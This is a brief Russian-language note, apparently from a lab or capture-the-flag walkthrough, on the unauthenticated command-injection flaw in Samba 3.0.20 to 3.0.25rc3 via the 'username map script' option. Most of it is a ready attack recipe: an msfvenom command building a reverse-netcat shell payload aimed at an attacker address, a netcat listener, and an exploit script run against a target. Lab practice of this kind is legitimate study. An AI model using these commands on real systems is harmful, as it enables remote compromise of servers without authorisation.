
Этот модуль эксплуатирует уязвимость выполнения команд в Samba версиях 3.0.20 по 3.0.25rc3 при использовании нестандартной опции конфигурации "username map script". Указывая имя пользователя, содержащее метасимволы оболочки, атакующие могут выполнять произвольные команды. Для эксплуатации этой уязвимости не требуется аутентификация, поскольку эта опция используется для сопоставления имён пользователей до аутентификации!
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
nc -nlvp 5555
python3 smbusermap.py <Target IP>
